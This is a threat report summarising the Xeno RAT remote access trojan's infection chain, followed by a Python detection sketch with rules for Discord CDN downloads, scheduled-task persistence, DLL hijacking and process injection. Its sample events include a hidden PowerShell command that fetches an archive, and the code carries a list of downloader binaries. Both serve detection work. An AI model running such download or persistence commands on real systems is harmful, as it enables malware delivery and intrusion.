An “intricately designed” remote access trojan (RAT) called Xeno RAT has been made available on GitHub, making it available to other actors at no extra cost. Written in C# and compatible with Windows 10 and Windows 11 operating systems, the open-source RAT comes with a “comprehensive set of features for remote system management,” according to its developer, who goes by the name moom825.
The Hacker News
KEY FINDINGS
- Xeno RAT possesses sophisticated functionalities and characteristics of advanced malware.
- The malware’s developer opted to maintain it as an open-source project and made it accessible via GitHub.
- A threat actor customized its settings and disseminated it via the Discord CDN.
- The primary infection vector is a shortcut (.lnk) file disguised as a WhatsApp screenshot, which acts as a downloader.
- The downloader fetches a ZIP archive from the Discord CDN, extracts it, and executes the next-stage payload.
- A multi-step process is employed to generate the ultimate payload of the malware.
- It checks for debuggers, monitoring and analysis tools before executing the final stage.
- Utilizes anti-debugging techniques and operates stealthily.
- The malware adds itself as a scheduled task for persistence.
- Abuses the Windows DLL search order (search order hijacking) to have a trusted executable load the malicious DLL.
- Injects malicious code into a legitimate Windows process (process injection).
- Performs continuous monitoring of the compromised systems.
- Employs extensive obfuscation of files and code to evade detection.
- Uses obfuscated network traffic to receive instructions and updates.
- Communicates with C2 with status updates and receives instructions at regular intervals.
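The findings above describe a chain (shortcut-driven download from the Discord CDN, scheduled-task persistence, DLL search order abuse, process injection) that endpoint telemetry can surface. The following is an added detection sketch, not code from the report or from Xeno RAT itself: it runs four rules over constructed Sysmon-style events (simplified dicts standing in for Event IDs 1, 7 and 8; the field names `ImageSigned`/`DllSigned` are an assumption, not Sysmon's exact schema) and reports which rule each event trips. Every path, URL and command line in the sample data is made up for the demonstration and is not an indicator from the report.

```python
"""Defender-side detection sketch for the behaviours listed in the key findings.

Added example, not part of the original report. Events are constructed,
simplified Sysmon-like records; the signing fields are an assumed simplification.
"""
import re

# Constructed sample telemetry (hypothetical paths and URLs, not real IoCs).
SAMPLE_EVENTS = [
    # 1) User opens a shortcut posing as a screenshot; its command line pulls an
    #    archive from the Discord CDN (the delivery path described above).
    {"EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"iwr https://cdn.discordapp.com/"
                    "attachments/111/222/pkg.zip -OutFile $env:TEMP\\p.zip\""},
    # 2) Persistence: a scheduled task whose action lives in a user-writable folder.
    {"EventID": 1,
     "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\stage2.exe",
     "CommandLine": "schtasks /create /sc minute /mo 5 /tn Updater "
                    "/tr C:\\Users\\alice\\AppData\\Roaming\\upd\\host.exe"},
    # 3) DLL search order abuse: a signed host binary loads an unsigned DLL
    #    from a user-writable directory.
    {"EventID": 7,
     "Image": r"C:\Users\alice\AppData\Roaming\upd\host.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Roaming\upd\version.dll",
     "ImageSigned": True, "DllSigned": False},
    # 4) Process injection: remote thread created in a Windows system process.
    {"EventID": 8,
     "SourceImage": r"C:\Users\alice\AppData\Roaming\upd\host.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe"},
    # 5) Benign control: signed DLL loaded from System32 by a system binary.
    {"EventID": 7,
     "Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "ImageSigned": True, "DllSigned": True},
]

# Directories an unprivileged user can write to; DLLs and task actions here are suspect.
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\(AppData|Downloads)|ProgramData|Windows\\Temp)\\", re.I)

# Living-off-the-land binaries commonly used to fetch a stage from a URL.
DOWNLOADERS = {"powershell.exe", "cmd.exe", "curl.exe", "certutil.exe",
               "bitsadmin.exe", "mshta.exe", "wscript.exe"}


def basename(path):
    """Lower-cased file name component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def rule_discord_cdn_download(ev):
    """Script host or download utility with a Discord CDN URL on its command line."""
    return (ev.get("EventID") == 1
            and basename(ev["Image"]) in DOWNLOADERS
            and "cdn.discordapp.com" in ev.get("CommandLine", "").lower())


def rule_schtasks_persistence(ev):
    """schtasks /create whose action points into a user-writable directory."""
    cmd = ev.get("CommandLine", "")
    return (ev.get("EventID") == 1
            and basename(ev["Image"]) == "schtasks.exe"
            and "/create" in cmd.lower()
            and bool(USER_WRITABLE.search(cmd)))


def rule_dll_search_order_abuse(ev):
    """Signed process loading an unsigned DLL from a user-writable directory."""
    return (ev.get("EventID") == 7
            and bool(ev.get("ImageSigned")) and not ev.get("DllSigned")
            and bool(USER_WRITABLE.search(ev["ImageLoaded"])))


def rule_remote_thread_injection(ev):
    """CreateRemoteThread from one image into a different Windows system process."""
    if ev.get("EventID") != 8:
        return False
    src, tgt = ev["SourceImage"].lower(), ev["TargetImage"].lower()
    return src != tgt and tgt.startswith("c:\\windows\\")


RULES = {
    "discord_cdn_download": rule_discord_cdn_download,
    "schtasks_persistence": rule_schtasks_persistence,
    "dll_search_order_abuse": rule_dll_search_order_abuse,
    "remote_thread_injection": rule_remote_thread_injection,
}


def evaluate(events):
    """Map event index -> list of rule names tripped, for events with at least one hit."""
    hits = {}
    for i, ev in enumerate(events):
        names = [name for name, fn in RULES.items() if fn(ev)]
        if names:
            hits[i] = names
    return hits


if __name__ == "__main__":
    for idx, names in evaluate(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(names)}")
```

Each rule on its own is noisy in a real environment (administrators create tasks, legitimate software loads DLLs from `%APPDATA%`); the value lies in correlating hits from the same host and process tree, which is what ties the separate findings above into one intrusion.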